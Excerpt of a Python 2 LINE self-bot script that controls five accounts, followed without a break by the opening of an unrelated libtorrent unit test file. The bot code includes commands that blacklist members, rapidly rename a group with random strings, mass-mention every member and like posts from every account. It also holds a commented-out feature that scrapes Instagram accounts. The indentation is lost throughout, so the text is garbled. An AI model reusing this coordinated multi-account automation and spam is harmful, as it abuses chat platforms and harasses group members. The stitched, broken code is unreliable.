_name = msg.text.replace("Ar Unban @","")
_nametarget = _name.rstrip(' ')
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = kg.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Added to Whitelist")
except:
ki.sendText(msg.to,"Added to Whitelist")
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "Ar ban @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[Command]Ban executed"
_name = msg.text.replace("Ar ban @","")
_nametarget = _name.rstrip(' ')
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = kg.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Added to Blacklist")
except:
ki.sendText(msg.to,"Error")
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "Ar unban @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[Command]Unban executed"
_name = msg.text.replace("Ar unban @","")
_nametarget = _name.rstrip(' ')
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = kg.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Added to Whitelist")
except:
ki.sendText(msg.to,"Added to Whitelist")
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif msg.text in ["Ar Ban","Ar ban"]:
if msg.from_ in admin:
wait["wblacklist"] = True
cl.sendText(msg.to,"Send Contact to Ban")
print "[Command]Ban executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
print "[Error]Command denied - Admin permission required"
elif msg.text in ["Ar Unban","Ar unban"]:
if msg.from_ in admin:
wait["dblacklist"] = True
cl.sendText(msg.to,"Send Contact to Unban")
print "[Command]Unban executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
print "[Error]Command denied - Admin permission required"
elif msg.text in ["Ar Banlist","Ar banlist"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"No user is Blacklisted")
else:
cl.sendText(msg.to,"Blacklisted user(s)")
mc = ""
for mi_d in wait["blacklist"]:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
print "[Command]Banlist executed"
#-----------------------[Bot Speak Section]------------------------
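# "Ar Bc <text>" broadcasts the text through a randomly chosen bot account; the lowercase "Ar bc <text>" variant always uses the primary account.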
elif "Ar Bc " in msg.text:
if msg.from_ in staff:
bctxt = msg.text.replace("Ar Bc ","")
random.choice(KAC).sendText(msg.to,(bctxt))
print "[Command]Bc executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Staff or higher permission required.")
print "[Error]Command denied - staff or higher permission required"
elif "Ar bc " in msg.text:
if msg.from_ in staff:
bctxt = msg.text.replace("Ar bc ","")
cl.sendText(msg.to,(bctxt))
print "[Command]Bc executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Staff or higher permission required.")
print "[Error]Command denied - staff or higher permission required"
#-----------------------[Bot speed test Section]------------------------
elif msg.text in ["Ar Sp all","Ar Speed all","Ar sp all","Ar speed all"]:
if msg.from_ in staff:
start = time.time()
cl.sendText(msg.to, "Bot 1 Processing Request")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
start2 = time.time()
kk.sendText(msg.to, "Bot 2 Processing Request")
elapsed_time2 = time.time() - start2
kk.sendText(msg.to, "%sseconds" % (elapsed_time2))
start3 = time.time()
ki.sendText(msg.to, "Bot 3 Processing Request")
elapsed_time3 = time.time() - start3
ki.sendText(msg.to, "%sseconds" % (elapsed_time3))
start4 = time.time()
kc.sendText(msg.to, "Bot 4 Processing Request")
elapsed_time4 = time.time() - start4
kc.sendText(msg.to, "%sseconds" % (elapsed_time4))
start5 = time.time()
kg.sendText(msg.to, "Bot 5 Processing Request")
elapsed_time5 = time.time() - start5
kg.sendText(msg.to, "%sseconds" % (elapsed_time5))
print "[Command]Speed all executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Staff or higher permission required.")
print "[Error]Command denied - staff or higher permission required"
elif msg.text in ["Ar Sp 1","Ar Speed 1","Ar sp 1","Ar speed 1"]:
if msg.from_ in staff:
start = time.time()
cl.sendText(msg.to, "Progress...")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed 1 executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Staff or higher permission required.")
print "[Error]Command denied - staff or higher permission required"
elif msg.text in ["Ar Sp 2","Ar Speed 2","Ar sp 2","Ar speed 2"]:
if msg.from_ in staff:
start = time.time()
kk.sendText(msg.to, "Progress...")
elapsed_time = time.time() - start
kk.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed 2 executed"
else:
kk.sendText(msg.to,"Command denied.")
kk.sendText(msg.to,"Staff or higher permission required.")
print "[Error]Command denied - staff or higher permission required"
elif msg.text in ["Ar Sp 3","Ar Speed 3","Ar sp 3","Ar speed 3"]:
if msg.from_ in staff:
start = time.time()
ki.sendText(msg.to, "Progress...")
elapsed_time = time.time() - start
ki.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed 3 executed"
else:
ki.sendText(msg.to,"Command denied.")
ki.sendText(msg.to,"Staff or higher permission required.")
print "[Error]Command denied - staff or higher permission required"
elif msg.text in ["Ar Sp 4","Ar Speed 4","Ar sp 4","Ar speed 4"]:
if msg.from_ in staff:
start = time.time()
kc.sendText(msg.to, "Progress...")
elapsed_time = time.time() - start
kc.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed 4 executed"
else:
kc.sendText(msg.to,"Command denied.")
kc.sendText(msg.to,"Staff or higher permission required.")
print "[Error]Command denied - staff or higher permission required"
elif msg.text in ["Ar Sp 5","Ar Speed 5","Ar sp 5","Ar speed 5"]:
if msg.from_ in staff:
start = time.time()
kg.sendText(msg.to, "Progress...")
elapsed_time = time.time() - start
kg.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed 5 executed"
else:
kc.sendText(msg.to,"Command denied.")
kc.sendText(msg.to,"Staff or higher permission required.")
print "[Error]Command denied - staff or higher permission required"
#-----------------------[Staff Management Section]------------------------
elif "Ar staff add @" in msg.text:
if msg.from_ in admin:
print "[Command]Staff add executing"
_name = msg.text.replace("Ar staff add @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = kg.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.append(target)
cl.sendText(msg.to,"Added to the staff list")
except:
pass
print "[Command]Staff add executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "Ar Staff add @" in msg.text:
if msg.from_ in admin:
print "[Command]Staff add executing"
_name = msg.text.replace("Ar Staff add @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = kg.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.append(target)
cl.sendText(msg.to,"Added to the staff list")
except:
pass
print "[Command]Staff add executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "Ar staff remove @" in msg.text:
if msg.from_ in admin:
print "[Command]Staff remove executing"
_name = msg.text.replace("Ar staff remove @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = kg.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.remove(target)
cl.sendText(msg.to,"Removed to the staff list")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "Ar Staff remove @" in msg.text:
if msg.from_ in admin:
print "[Command]Staff remove executing"
_name = msg.text.replace("Ar Staff remove @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = kg.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.remove(target)
cl.sendText(msg.to,"Removed to the staff list")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif msg.text in ["Ar Stafflist","Ar stafflist"]:
if staff == []:
cl.sendText(msg.to,"The stafflist is empty")
else:
cl.sendText(msg.to,"Staff list:")
mc = ""
for mi_d in staff:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
print "[Command]Stafflist executed"
#-----------------------[Auto cancel Section]------------------------
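# These commands only toggle cancelinvite["autoCancel"] / cancelinvite["autoCancelUrl"]; the actual cancelling is presumably performed by the invitation handler elsewhere in this script.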
elif msg.text in ["Ar Cancel off","Ar cancel off"]:
if msg.from_ in staff:
if cancelinvite["autoCancel"] == True:
cancelinvite["autoCancel"] = False
cl.sendText(msg.to, "Auto Cancel turned off")
print "[Command]Cancel off executed"
else:
cl.sendText(msg.to, "Auto Cancel already turned off")
print "[Command]Cancel off executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Staff or higher permission required.")
print "[Error]Command denied - staff or higher permission required"
elif msg.text in ["Ar Cancel on","Ar cancel on"]:
if msg.from_ in staff:
if cancelinvite["autoCancel"] == False:
cancelinvite["autoCancel"] = True
cl.sendText(msg.to, "Auto Cancel turned on")
print "[Command]Cancel on executed"
else:
cl.sendText(msg.to, "Auto Cancel already turned on")
print "[Command]Cancel on executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Staff or higher permission required.")
print "[Error]Command denied - staff or higher permission required"
elif msg.text in ["Ar Url off","Ar url off"]:
if msg.from_ in staff:
if cancelinvite["autoCancelUrl"] == True:
cancelinvite["autoCancelUrl"] = False
cl.sendText(msg.to, "Auto Cancel Url turned off")
print "[Command]Url off executed"
else:
cl.sendText(msg.to, "Auto Cancel already turned off")
print "[Command]Url off executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Staff or higher permission required.")
print "[Error]Command denied - staff or higher permission required"
elif msg.text in ["Ar Url on","Ar url on"]:
if msg.from_ in staff:
if cancelinvite["autoCancelUrl"] == True:
cancelinvite["autoCancelUrl"] = False
cl.sendText(msg.to, "Auto Cancel Url turned off")
print "[Command]Url on executed"
else:
cl.sendText(msg.to, "Auto Cancel already turned off")
print "[Command]Url on executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Staff or higher permission required.")
print "[Error]Command denied - staff or higher permission required"
#-----------------------[Misc Section]-------------------------------------------
elif "Ar random:" in msg.text:
if msg.toType == 2:
if msg.from_ in staff:
strnum = msg.text.replace("Ar random:","")
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
try:
num = int(strnum)
group = cl.getGroup(msg.to)
for var in range(0,num):
name = "".join([random.choice(source_str) for x in xrange(10)])
time.sleep(0.05)
group.name = name
random.choice(KAC).updateGroup(group)
except:
cl.sendText(msg.to,"Error")
print "[Command]Random executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Staff or higher permission required.")
print "[Error]Command denied - staff or higher permission required"
elif "Ar Random:" in msg.text:
if msg.toType == 2:
if msg.from_ in staff:
strnum = msg.text.replace("Ar Random:","")
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
try:
num = int(strnum)
group = cl.getGroup(msg.to)
for var in range(0,num):
name = "".join([random.choice(source_str) for x in xrange(10)])
time.sleep(0.01)
group.name = name
cl.updateGroup(group)
except:
cl.sendText(msg.to,"Error")
print "[Command]Random executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Staff or higher permission required.")
print "[Error]Command denied - staff or higher permission required"
elif msg.text in ["Ar Absen","Ar absen"]:
if msg.from_ in staff:
cl.sendText(msg.to, "Hadir")
kk.sendText(msg.to, "Hadir")
ki.sendText(msg.to, "Hadir")
kc.sendText(msg.to, "Hadir")
kg.sendText(msg.to, "Hadir")
print "[Command]Absen executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Staff or higher permission required.")
print "[Error]Command denied - staff or higher permission required"
elif msg.text in ["Ar Kernel","Ar kernel"]:
if msg.from_ in admin:
botKernel = subprocess.Popen(["uname","-svmo"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel)
print "[Command]Kernel executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
print "[Error]Command denied - Admin permission required"
# elif "Ar Stalk " in msg.text:
# print "[Command]Stalk executing"
# stalkID = msg.text.replace("Ar Stalk ","")
# subprocess.call(["instaLooter",stalkID,"tmp/","-n","1"])
# files = glob.glob("tmp/*.jpg")
# for file in files:
# os.rename(file,"tmp/tmp.jpg")
# fileTmp = glob.glob("tmp/tmp.jpg")
# if not fileTmp:
# cl.sendText(msg.to, "Image not found, maybe the account haven't post a single picture or the account is private")
# print "[Command]Stalk executed - no image found"
# else:
# image = upload_tempimage(client)
# cl.sendText(msg.to, format(image['link']))
# print "[Command]Stalk executed - success"
# elif "Ar stalk " in msg.text:
# print "[Command]Stalk executing"
# stalkID = msg.text.replace("Ar stalk ","")
# subprocess.call(["instaLooter",stalkID,"tmp/","-n","1"])
# files = glob.glob("tmp/*.jpg")
# for file in files:
# os.rename(file,"tmp/tmp.jpg")
# fileTmp = glob.glob("tmp/tmp.jpg")
# if not fileTmp:
# cl.sendText(msg.to, "Image not found, maybe the account haven't post a single picture or the account is private")
# print "[Command]Stalk executed - no image found"
# else:
# image = upload_tempimage(client)
# cl.sendText(msg.to, format(image['link']))
# subprocess.call(["sudo","rm","-rf","tmp/tmp.jpg"])
# print "[Command]Stalk executed - success"
elif "Ar Add @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[Command]Add executing"
_name = msg.text.replace("Ar Add @","")
_nametarget = _name.rstrip(' ')
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = kg.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
except:
ki.sendText(msg.to,"Error")
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "Ar add @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[Command]Add executed"
_name = msg.text.replace("Ar Add @","")
_nametarget = _name.rstrip(' ')
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = kg.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
cl.findAndAddContactsByMid(target)
ki.findAndAddContactsByMid(target)
kk.findAndAddContactsByMid(target)
kc.findAndAddContactsByMid(target)
kg.findAndAddContactsByMid(target)
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif msg.text in ["Ar Like", "Ar like"]:
if msg.from_ in staff:
print "[Command]Like executed"
cl.sendText(msg.to,"Trying to Like post(s) from staff")
try:
likePost()
except:
pass
elif msg.text in ["Ar Tagall", "Ar tagall"]:
group = cl.getGroup(msg.to)
msg_appended = ""
mem = [contact.mid for contact in group.members]
for mm in mem:
xname = cl.getContact(mm).displayName
xlen = str(len(xname)+1)
msg.contentType = 0
msg.text = "@"+xname+" "
msg.contentMetadata ={'MENTION':'{"MENTIONEES":[{"S":"0","E":'+json.dumps(xlen)+',"M":'+json.dumps(mm)+'}]}','EMTVER':'4'}
# msg_appended += "->" +msg+ "\n"
try:
cl.sendMessage(msg)
except Exception as error:
print error
else:
if cl.getGroup(msg.to).preventJoinByTicket == False:
cl.reissueGroupTicket(msg.to)
X = cl.getGroup(msg.to)
X.preventJoinByTicket = True
random.choice(KAC).updateGroup(X)
else:
if msg.from_ in Bots:
pass
else:
print "No Action"
if op.type == 59:
print op
except Exception as error:
print error
# def nameUpdate_Bot1():
# while True:
# try:
# profile = cl.getProfile()
# profile.displayName = bot1_name["1"]
# cl.updateProfile(profile)
# time.sleep(0.5)
# profile = cl.getProfile()
# profile.displayName = bot1_name["2"]
# cl.updateProfile(profile)
# time.sleep(0.5)
# profile = cl.getProfile()
# profile.displayName = bot1_name["3"]
# cl.updateProfile(profile)
# time.sleep(0.5)
# profile = cl.getProfile()
# profile.displayName = bot1_name["4"]
# cl.updateProfile(profile)
# time.sleep(0.5)
# profile = cl.getProfile()
# profile.displayName = bot1_name["5"]
# cl.updateProfile(profile)
# time.sleep(0.5)
# profile = cl.getProfile()
# profile.displayName = bot1_name["6"]
# cl.updateProfile(profile)
# time.sleep(0.5)
# profile = cl.getProfile()
# profile.displayName = bot1_name["7"]
# cl.updateProfile(profile)
# time.sleep(0.5)
# profile = cl.getProfile()
# profile.displayName = bot1_name["8"]
# cl.updateProfile(profile)
# time.sleep(0.5)
# profile = cl.getProfile()
# profile.displayName = bot1_name["9"]
# cl.updateProfile(profile)
# time.sleep(0.5)
# profile = cl.getProfile()
# profile.displayName = bot1_name["10"]
# cl.updateProfile(profile)
# time.sleep(0.5)
# profile = cl.getProfile()
# profile.displayName = bot1_name["11"]
# cl.updateProfile(profile)
# time.sleep(0.5)
# except:
# pass
# def nameUpdate_Bot2():
# while True:
# try:
# profile = kk.getProfile()
# profile.displayName = bot2_name["1"]
# kk.updateProfile(profile)
# time.sleep(0.5)
# profile = kk.getProfile()
# profile.displayName = bot2_name["2"]
# kk.updateProfile(profile)
# time.sleep(0.5)
# profile = kk.getProfile()
# profile.displayName = bot2_name["3"]
# kk.updateProfile(profile)
# time.sleep(0.5)
# profile = kk.getProfile()
# profile.displayName = bot2_name["4"]
# kk.updateProfile(profile)
# time.sleep(0.5)
# profile = kk.getProfile()
# profile.displayName = bot2_name["5"]
# kk.updateProfile(profile)
# time.sleep(0.5)
# profile = kk.getProfile()
# profile.displayName = bot2_name["6"]
# kk.updateProfile(profile)
# time.sleep(0.5)
# profile = kk.getProfile()
# profile.displayName = bot2_name["7"]
# kk.updateProfile(profile)
# time.sleep(0.5)
# profile = kk.getProfile()
# profile.displayName = bot2_name["8"]
# kk.updateProfile(profile)
# time.sleep(0.5)
# profile = kk.getProfile()
# profile.displayName = bot2_name["9"]
# kk.updateProfile(profile)
# time.sleep(0.5)
# profile = kk.getProfile()
# profile.displayName = bot2_name["10"]
# kk.updateProfile(profile)
# time.sleep(0.5)
# profile = kk.getProfile()
# profile.displayName = bot2_name["11"]
# kk.updateProfile(profile)
# time.sleep(0.5)
# except:
# pass
# def nameUpdate_Bot3():
# while True:
# try:
# profile = ki.getProfile()
# profile.displayName = bot3_name["1"]
# ki.updateProfile(profile)
# time.sleep(0.5)
# profile = ki.getProfile()
# profile.displayName = bot3_name["2"]
# ki.updateProfile(profile)
# time.sleep(0.5)
# profile = ki.getProfile()
# profile.displayName = bot3_name["3"]
# ki.updateProfile(profile)
# time.sleep(0.5)
# profile = ki.getProfile()
# profile.displayName = bot3_name["4"]
# ki.updateProfile(profile)
# time.sleep(0.5)
# profile = ki.getProfile()
# profile.displayName = bot3_name["5"]
# ki.updateProfile(profile)
# time.sleep(0.5)
# profile = ki.getProfile()
# profile.displayName = bot3_name["6"]
# ki.updateProfile(profile)
# time.sleep(0.5)
# profile = ki.getProfile()
# profile.displayName = bot3_name["7"]
# ki.updateProfile(profile)
# time.sleep(0.5)
# profile = ki.getProfile()
# profile.displayName = bot3_name["8"]
# ki.updateProfile(profile)
# time.sleep(0.5)
# profile = ki.getProfile()
# profile.displayName = bot3_name["9"]
# ki.updateProfile(profile)
# time.sleep(0.5)
# profile = ki.getProfile()
# profile.displayName = bot3_name["10"]
# ki.updateProfile(profile)
# time.sleep(0.5)
# profile = ki.getProfile()
# profile.displayName = bot3_name["11"]
# ki.updateProfile(profile)
# time.sleep(0.5)
# except:
# pass
# def nameUpdate_Bot4():
# while True:
# try:
# profile = kc.getProfile()
# profile.displayName = bot4_name["1"]
# kc.updateProfile(profile)
# time.sleep(0.5)
# profile = kc.getProfile()
# profile.displayName = bot4_name["2"]
# kc.updateProfile(profile)
# time.sleep(0.5)
# profile = kc.getProfile()
# profile.displayName = bot4_name["3"]
# kc.updateProfile(profile)
# time.sleep(0.5)
# profile = kc.getProfile()
# profile.displayName = bot4_name["4"]
# kc.updateProfile(profile)
# time.sleep(0.5)
# profile = kc.getProfile()
# profile.displayName = bot4_name["5"]
# kc.updateProfile(profile)
# time.sleep(0.5)
# profile = kc.getProfile()
# profile.displayName = bot4_name["6"]
# kc.updateProfile(profile)
# time.sleep(0.5)
# profile = kc.getProfile()
# profile.displayName = bot4_name["7"]
# kc.updateProfile(profile)
# time.sleep(0.5)
# profile = kc.getProfile()
# profile.displayName = bot4_name["8"]
# kc.updateProfile(profile)
# time.sleep(0.5)
# profile = kc.getProfile()
# profile.displayName = bot4_name["9"]
# kc.updateProfile(profile)
# time.sleep(0.5)
# profile = kc.getProfile()
# profile.displayName = bot4_name["10"]
# kc.updateProfile(profile)
# time.sleep(0.5)
# profile = kc.getProfile()
# profile.displayName = bot4_name["11"]
# kc.updateProfile(profile)
# time.sleep(0.5)
# except:
# pass
# def nameUpdate_Bot5():
# while True:
# try:
# profile = kg.getProfile()
# profile.displayName = bot5_name["1"]
# kg.updateProfile(profile)
# time.sleep(0.5)
# profile = kg.getProfile()
# profile.displayName = bot5_name["2"]
# kg.updateProfile(profile)
# time.sleep(0.5)
# profile = kg.getProfile()
# profile.displayName = bot5_name["3"]
# kg.updateProfile(profile)
# time.sleep(0.5)
# profile = kg.getProfile()
# profile.displayName = bot5_name["4"]
# kg.updateProfile(profile)
# time.sleep(0.5)
# profile = kg.getProfile()
# profile.displayName = bot5_name["5"]
# kg.updateProfile(profile)
# time.sleep(0.5)
# profile = kg.getProfile()
# profile.displayName = bot5_name["6"]
# kg.updateProfile(profile)
# time.sleep(0.5)
# profile = kg.getProfile()
# profile.displayName = bot5_name["7"]
# kg.updateProfile(profile)
# time.sleep(0.5)
# profile = kg.getProfile()
# profile.displayName = bot5_name["8"]
# kg.updateProfile(profile)
# time.sleep(0.5)
# profile = kg.getProfile()
# profile.displayName = bot5_name["9"]
# kg.updateProfile(profile)
# time.sleep(0.5)
# profile = kg.getProfile()
# profile.displayName = bot5_name["10"]
# kg.updateProfile(profile)
# time.sleep(0.5)
# profile = kg.getProfile()
# profile.displayName = bot5_name["11"]
# kg.updateProfile(profile)
# time.sleep(0.5)
# except:
# pass
# def nameUpdate():
# while True:
# try:
# #while a2():
# #pass
# if wait["clock"] == True:
# now2 = datetime.now()
# nowT = datetime.strftime(now2,"(%H:%M)")
# profile = cl.getProfile()
# profile.displayName = wait["cName"]
# cl.updateProfile(profile)
# profile2 = kk.getProfile()
# profile2.displayName = wait["cName2"]
# kk.updateProfile(profile2)
# profile3 = ki.getProfile()
# profile3.displayName = wait["cName3"]
# ki.updateProfile(profile3)
# profile4 = kc.getProfile()
# profile4.displayName = wait["cName4"]
# kc.updateProfile(profile4)
# profile5 = kg.getProfile()
# profile5.displayName = wait["cName5"]
# kg.updateProfile(profile5)
# time.sleep(600)
# except:
# pass
# thread2 = threading.Thread(target=nameUpdate)
# thread2.daemon = True
# thread2.start()
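# likePost: scan the 20 most recent timeline posts and, for any unliked post made by a staff member, like it from every bot account and leave a comment.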
def likePost():
for zx in range(0,20):
hasil = cl.activity(limit=20)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
if hasil['result']['posts'][zx]['userInfo']['mid'] in staff:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
kk.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
ki.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
kc.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
kg.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Auto like by ARDH-")
print "Like"
except:
pass
else:
print "Not Admin or staff"
# Auto Changing name
# thread1 = threading.Thread(target=nameUpdate_Bot1)
# thread1.daemon = True
# thread1.start()
# thread2 = threading.Thread(target=nameUpdate_Bot2)
# thread2.daemon = True
# thread2.start()
# thread3 = threading.Thread(target=nameUpdate_Bot3)
# thread3.daemon = True
# thread3.start()
# thread4 = threading.Thread(target=nameUpdate_Bot4)
# thread4.daemon = True
# thread4.start()
# thread5 = threading.Thread(target=nameUpdate_Bot5)
# thread5.daemon = True
# thread5.start()
# END
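# Main polling loop: fetch up to 5 pending operations, advance the stored revision, and hand each operation to bot() for dispatch.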
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
test.py
#!/usr/bin/env python3
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
import libtorrent as lt
import unittest
import time
import datetime
import os
import shutil
import binascii
import subprocess as sub
import sys
import pickle
import threading
import tempfile
import socket
import select
import logging
import ssl
import http.server
import functools
import dummy_data
# include the terminal interface for Travis' parallel execution of scripts that use
# terminal features: fixes multiple stdin assignment at termios.tcgetattr
if os.name != 'nt':
import pty
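# Session settings shared by all tests: every alert category enabled, DHT/LSD/NAT-PMP/UPnP disabled,
# an ephemeral listen port ('0.0.0.0:0') and a file pool of 1, so the tests stay self-contained and offline.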
settings = {
'alert_mask': lt.alert.category_t.all_categories,
'enable_dht': False, 'enable_lsd': False, 'enable_natpmp': False,
'enable_upnp': False, 'listen_interfaces': '0.0.0.0:0', 'file_pool_size': 1}
def has_deprecated():
return hasattr(lt, 'version')
class test_create_torrent(unittest.TestCase):
def test_from_torrent_info(self):
ti = lt.torrent_info('unordered.torrent')
print(ti.ssl_cert())
ct = lt.create_torrent(ti)
entry = ct.generate()
content = lt.bencode(entry).strip()
with open('unordered.torrent', 'rb') as f:
file_content = bytearray(f.read().strip())
print(content)
print(file_content)
print(entry)
self.assertEqual(content, file_content)
def test_from_scratch(self):
fs = lt.file_storage()
fs.add_file('test/file1', 1000)
fs.add_file('test/file2', 2000)
self.assertEqual(fs.file_name(0), 'file1')
self.assertEqual(fs.file_name(1), 'file2')
ct = lt.create_torrent(fs)
ct.add_url_seed('foo')
ct.add_http_seed('bar')
ct.add_tracker('bar')
ct.set_root_cert('1234567890')
ct.add_collection('1337')
entry = ct.generate()
encoded = lt.bencode(entry)
print(encoded)
# zero out the creation date:
encoded = encoded.split(b'13:creation datei', 1)
encoded[1] = b'0e' + encoded[1].split(b'e', 1)[1]
encoded = b'13:creation datei'.join(encoded)
self.assertEqual(encoded, b'd8:announce3:bar13:creation datei0e9:httpseeds3:bar4:infod11:collectionsl4:1337e5:filesld6:lengthi2000e4:pathl5:file2eed6:lengthi1000e4:pathl5:file1eee4:name4:test12:piece lengthi16384e6:pieces20:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x008:ssl-cert10:1234567890e8:url-list3:fooe')
class test_session_stats(unittest.TestCase):
def test_add_torrent_params(self):
atp = lt.add_torrent_params()
for field_name in dir(atp):
field = getattr(atp, field_name)
print(field_name, field)
atp.renamed_files = {}
atp.merkle_tree = []
atp.unfinished_pieces = {}
atp.have_pieces = []
atp.banned_peers = []
